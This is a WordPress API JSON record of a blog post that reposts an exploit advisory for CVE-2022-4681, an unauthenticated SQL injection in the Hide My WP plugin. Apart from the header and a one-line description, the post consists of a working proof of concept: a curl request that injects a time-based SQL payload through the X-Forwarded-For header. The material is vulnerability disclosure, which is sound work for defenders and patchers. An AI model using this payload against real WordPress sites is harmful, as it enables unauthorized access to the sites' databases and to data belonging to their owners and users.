{"id":55291,"date":"2024-03-11T18:59:52","date_gmt":"2024-03-11T15:59:52","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177519\/wphidemywp-sql.txt"},"modified":"2024-03-12T11:08:18","modified_gmt":"2024-03-12T07:38:18","slug":"wordpress-hide-my-wp-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-hide-my-wp-sql-injection\/","title":{"rendered":"WordPress Hide My WP SQL Injection"},"content":{"rendered":"<pre><code># Exploit Title: Wordpress Plugin Hide My WP &lt; 6.2.9 - Unauthenticated SQLi \r\n# Publication Date: 2023-01-11\r\n# Original Researcher: Xenofon Vassilakopoulos\r\n# Exploit Author: Xenofon Vassilakopoulos\r\n# Submitter: Xenofon Vassilakopoulos\r\n# Vendor Homepage: https:\/\/wpwave.com\/\r\n# Version: Hide My WP v6.2.8 and prior\r\n# Tested on: Hide My WP v6.2.7\r\n# Impact: Database Access\r\n# CVE: CVE-2022-4681\r\n# CWE: CWE-89\r\n# CVSS Score: 8.6 (high)<\/code><\/pre>\n<p>## Description<\/p>\n<pre><code><\/code><\/pre>\n<p>The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.<\/p>\n<pre><code><\/code><\/pre>\n<p>## Proof of Concept<\/p>\n<pre><code><\/code><\/pre>\n<p>curl -k &#8211;location &#8211;request GET &#8220;http:\/\/localhost:10008&#8221; &#8211;header &#8220;X-Forwarded-For: 127.0.0.1&#8217;+(select*from(select(sleep(20)))a)+'&#8221;<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Wordpress Plugin Hide My WP &lt; 6.2.9 &#8211; Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https:\/\/wpwave.com\/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55291","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55291","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55291"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55291\/revisions"}],"predecessor-version":[{"id":55316,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55291\/revisions\/55316"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55291"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55291"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}